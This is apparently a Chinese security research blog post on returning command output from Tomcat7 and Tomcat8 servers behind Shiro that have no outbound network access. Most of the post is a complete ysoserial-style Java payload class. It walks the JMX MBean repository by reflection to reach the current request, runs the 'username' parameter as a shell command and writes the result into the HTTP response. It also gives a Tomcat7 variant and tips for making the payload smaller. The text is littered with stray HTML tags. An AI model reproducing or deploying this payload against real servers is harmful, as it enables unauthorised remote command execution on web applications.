Tomcat不出网回显技术研究 - 第六集：解决Tomcat7+Shiro环境下的回显问题<\/h1>

前情回顾<\/h2>

本文是"Tomcat不出网回显"系列文章的第六集，总结了前人关于Tomcat回显和无文件Webshell的研究成果：<\/p>

观星<\/strong>的文章：通杀Spring框架，解决实战中大部分情况<\/li>
Tomcat中一种半通用回显方法<\/strong>：通过反射修改ApplicationFilterChain参数缓存req和resp，但Shiro环境下无法回显<\/li>
基于tomcat的内存Webshell无文件攻击技术<\/strong>：获取req后进一步获取context并动态注册filter，同样无法在Shiro环境下回显<\/li>
基于全局储存的新思路<\/strong>：通过currentThread.getContextClassLoader()<\/code>获取StandardContext进而获取response，解决了Shiro回显问题，但不支持Tomcat7<\/li>

基于Tomcat无文件Webshell研究<\/strong>：总结上述方法，但仍无法解决Tomcat7+Shiro的组合问题<\/li> <\/ol> 新解决方案：通过MBean获取RequestProcessor<\/h2> 核心思路<\/h3> 研究发现RequestProcessor(RP)对象会被注册到全局存储中，通过JMX MBean机制可以获取到这些对象。具体步骤：<\/p> 通过JMX MBeanServer获取Tomcat的MBean<\/li> 找到包含Request对象的RequestProcessor<\/li> 从RequestProcessor中提取Request和Response对象<\/li> <\/ol> 技术细节<\/h3> Tomcat版本差异<\/h4> Tomcat7<\/strong>：MBean名称为name="http-bio-8888",type=GlobalRequestProcessor<\/code><\/li> Tomcat8<\/strong>：MBean名称为name="http-nio-8888",type=GlobalRequestProcessor<\/code><\/li> <\/ul> 其中8888是Tomcat服务端口，bio\/nio代表不同的I\/O模型。<\/p> 实现流程<\/h4> 获取MBeanServer实例<\/li> 通过反射获取MBeanServer内部的repository<\/li> 从repository中获取Catalina域的MBean<\/li> 找到GlobalRequestProcessor类型的MBean<\/li> 获取其中的RequestGroupInfo对象<\/li> 遍历processors列表获取RequestInfo对象<\/li> 从RequestInfo中提取Request对象<\/li> <\/ol> 代码实现<\/h3> Tomcat8实现<\/h4> package<\/span> ysoserial;<\/span> <\/span><\/span> <\/span><\/span>import<\/span> com.sun.org.apache.xalan.internal.xsltc.DOM;<\/span> <\/span><\/span>import<\/span> com.sun.org.apache.xalan.internal.xsltc.TransletException;<\/span> <\/span><\/span>import<\/span> com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;<\/span> <\/span><\/span>import<\/span> com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;<\/span> <\/span><\/span>import<\/span> com.sun.org.apache.xml.internal.serializer.SerializationHandler;<\/span> <\/span><\/span>import<\/span> org.apache.coyote.Request;<\/span> <\/span><\/span>import<\/span> org.apache.tomcat.util.buf.ByteChunk;<\/span> <\/span><\/span>import<\/span> org.apache.tomcat.util.modeler.Registry;<\/span> <\/span><\/span>import<\/span> javax.management.MBeanServer;<\/span> <\/span><\/span>import<\/span> java.io.InputStream;<\/span> <\/span><\/span>import<\/span> java.lang.reflect.Field;<\/span> <\/span><\/span>import<\/span> java.util.ArrayList;<\/span> <\/span><\/span>import<\/span> java.util.HashMap;<\/span> <\/span><\/span>import<\/span> java.util.Scanner;<\/span> <\/span><\/span> <\/span><\/span>public<\/span> class<\/span> tomcat82<\/span> extends<\/span> AbstractTranslet {<\/span> <\/span><\/span> public<\/span> tomcat82<\/span>()<\/span> {<\/span> <\/span><\/span> try<\/span>{<\/span> <\/span><\/span> \/\/ 获取MBeanServer <\/span><\/span><\/span><\/span> MBeanServer mbeanServer =<\/span> Registry.<\/span>getRegistry<\/span>((<\/span>Object)<\/span>null<\/span>,<\/span> (<\/span>Object)<\/span>null<\/span>).<\/span>getMBeanServer<\/span>();<\/span> <\/span><\/span> <\/span><\/span> \/\/ 通过反射获取MBeanServer内部的repository <\/span><\/span><\/span><\/span> Field field =<\/span> Class.<\/span>forName<\/span>(<\/span>"com.sun.jmx.mbeanserver.JmxMBeanServer"<\/span>).<\/span>getDeclaredField<\/span>(<\/span>"mbsInterceptor"<\/span>);<\/span> <\/span><\/span> field.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span> Object obj =<\/span> field.<\/span>get<\/span>(<\/span>mbeanServer);<\/span> <\/span><\/span> <\/span><\/span> field =<\/span> Class.<\/span>forName<\/span>(<\/span>"com.sun.jmx.interceptor.DefaultMBeanServerInterceptor"<\/span>).<\/span>getDeclaredField<\/span>(<\/span>"repository"<\/span>);<\/span> <\/span><\/span> field.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span> obj =<\/span> field.<\/span>get<\/span>(<\/span>obj);<\/span> <\/span><\/span> <\/span><\/span> \/\/ 获取Catalina域的MBean <\/span><\/span><\/span><\/span> field =<\/span> Class.<\/span>forName<\/span>(<\/span>"com.sun.jmx.mbeanserver.Repository"<\/span>).<\/span>getDeclaredField<\/span>(<\/span>"domainTb"<\/span>);<\/span> <\/span><\/span> field.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span> HashMap obj2 =<\/span> (<\/span>HashMap)<\/span>field.<\/span>get<\/span>(<\/span>obj);<\/span> <\/span><\/span> obj =<\/span> ((<\/span>HashMap)<\/span>obj2.<\/span>get<\/span>(<\/span>"Catalina"<\/span>)).<\/span>get<\/span>(<\/span>"name=\"http-nio-8888\",type=GlobalRequestProcessor"<\/span>);<\/span> <\/span><\/span> <\/span><\/span> \/\/ 获取RequestGroupInfo对象 <\/span><\/span><\/span><\/span> field =<\/span> Class.<\/span>forName<\/span>(<\/span>"com.sun.jmx.mbeanserver.NamedObject"<\/span>).<\/span>getDeclaredField<\/span>(<\/span>"object"<\/span>);<\/span> <\/span><\/span> field.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span> obj =<\/span> field.<\/span>get<\/span>(<\/span>obj);<\/span> <\/span><\/span> <\/span><\/span> field =<\/span> Class.<\/span>forName<\/span>(<\/span>"org.apache.tomcat.util.modeler.BaseModelMBean"<\/span>).<\/span>getDeclaredField<\/span>(<\/span>"resource"<\/span>);<\/span> <\/span><\/span> field.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span> obj =<\/span> field.<\/span>get<\/span>(<\/span>obj);<\/span> <\/span><\/span> <\/span><\/span> \/\/ 获取processors列表 <\/span><\/span><\/span><\/span> field =<\/span> Class.<\/span>forName<\/span>(<\/span>"org.apache.coyote.RequestGroupInfo"<\/span>).<\/span>getDeclaredField<\/span>(<\/span>"processors"<\/span>);<\/span> <\/span><\/span> field.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span> ArrayList obj3 =<\/span> (<\/span>ArrayList)<\/span>field.<\/span>get<\/span>(<\/span>obj);<\/span> <\/span><\/span> <\/span><\/span> \/\/ 获取Request对象 <\/span><\/span><\/span><\/span> field =<\/span> Class.<\/span>forName<\/span>(<\/span>"org.apache.coyote.RequestInfo"<\/span>).<\/span>getDeclaredField<\/span>(<\/span>"req"<\/span>);<\/span> <\/span><\/span> field.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span> <\/span><\/span> \/\/ 执行命令并回显 <\/span><\/span><\/span><\/span> boolean<\/span> isLinux =<\/span> true<\/span>;<\/span> <\/span><\/span> String osTyp =<\/span> System.<\/span>getProperty<\/span>(<\/span>"os.name"<\/span>);<\/span> <\/span><\/span> if<\/span> (<\/span>osTyp !=<\/span> null<\/span> &&<\/span> osTyp.<\/span>toLowerCase<\/span>().<\/span>contains<\/span>(<\/span>"win"<\/span>))<\/span> {<\/span> <\/span><\/span> isLinux =<\/span> false<\/span>;<\/span> <\/span><\/span> }<\/span> <\/span><\/span> <\/span><\/span> for<\/span> (<\/span>int<\/span> i =<\/span> 0<\/span>;<\/span> i <<\/span> obj3.<\/span>size<\/span>();<\/span> i++)<\/span> {<\/span> <\/span><\/span> Request obj4 =<\/span> (<\/span>Request)<\/span> field.<\/span>get<\/span>(<\/span>obj3.<\/span>get<\/span>(<\/span>i));<\/span> <\/span><\/span> String username =<\/span> obj4.<\/span>getParameters<\/span>().<\/span>getParameter<\/span>(<\/span>"username"<\/span>);<\/span> <\/span><\/span> if<\/span>(<\/span>username !=<\/span> null<\/span>){<\/span> <\/span><\/span> String[]<\/span> cmds =<\/span> isLinux ?<\/span> new<\/span> String[]{<\/span>"sh"<\/span>,<\/span> "-c"<\/span>,<\/span> username}<\/span> :<\/span> new<\/span> String[]{<\/span>"cmd.exe"<\/span>,<\/span> "\/c"<\/span>,<\/span> username};<\/span> <\/span><\/span> InputStream in =<\/span> Runtime.<\/span>getRuntime<\/span>().<\/span>exec<\/span>(<\/span>cmds).<\/span>getInputStream<\/span>();<\/span> <\/span><\/span> Scanner s =<\/span> new<\/span> Scanner(<\/span>in).<\/span>useDelimiter<\/span>(<\/span>"\\a"<\/span>);<\/span> <\/span><\/span> String output =<\/span> ""<\/span>;<\/span> <\/span><\/span> while<\/span> (<\/span>s.<\/span>hasNext<\/span>()){<\/span> <\/span><\/span> output +=<\/span> s.<\/span>next<\/span>();<\/span> <\/span><\/span> }<\/span> <\/span><\/span> <\/span><\/span> byte<\/span>[]<\/span> buf =<\/span> output.<\/span>getBytes<\/span>();<\/span> <\/span><\/span> ByteChunk bc =<\/span> new<\/span> ByteChunk();<\/span> <\/span><\/span> bc.<\/span>setBytes<\/span>(<\/span>buf,<\/span> 0<\/span>,<\/span> buf.<\/span>length<\/span>);<\/span> <\/span><\/span> obj4.<\/span>getResponse<\/span>().<\/span>doWrite<\/span>(<\/span>bc);<\/span> <\/span><\/span> break<\/span>;<\/span> <\/span><\/span> }<\/span> <\/span><\/span> }<\/span> <\/span><\/span> <\/span><\/span> }<\/span> catch<\/span> (<\/span>Exception e){<\/span> <\/span><\/span> }<\/span> <\/span><\/span> }<\/span> <\/span><\/span> \/\/ ... 其他必要方法 <\/span><\/span><\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>Tomcat7实现<\/h4> Tomcat7的实现与Tomcat8类似，主要区别在于MBean名称中的"bio"而非"nio"：<\/p> obj =<\/span> ((<\/span>HashMap)<\/span>obj2.<\/span>get<\/span>(<\/span>"Catalina"<\/span>)).<\/span>get<\/span>(<\/span>"name=\"http-bio-8888\",type=GlobalRequestProcessor"<\/span>);<\/span> <\/span><\/span><\/code><\/pre>注意事项<\/h3> 多请求环境处理<\/strong>：在生产环境中可能有多个RequestProcessor，需要遍历所有processor找到当前请求对应的那个<\/li> Payload体积优化<\/strong>：可以使用长亭师傅提供的修改header头的方法或参考"缩小ysoserial payload体积的几个方法"<\/li> 实际测试<\/strong>：已在Tomcat7+shiro-simple-web环境下成功复现<\/li> <\/ol> 总结<\/h2> 本方案通过JMX MBean机制获取Tomcat内部的RequestProcessor对象，解决了Tomcat7+Shiro环境下的回显问题。相比之前的方法：<\/p> 优点：支持Tomcat7+Shiro组合场景<\/li> 缺点：需要根据Tomcat版本调整MBean名称(bio\/nio)<\/li> <\/ul> 扩展思考<\/h2> Tomcat中还有许多其他MBean可能包含有用的信息，值得进一步探索和研究。<\/p>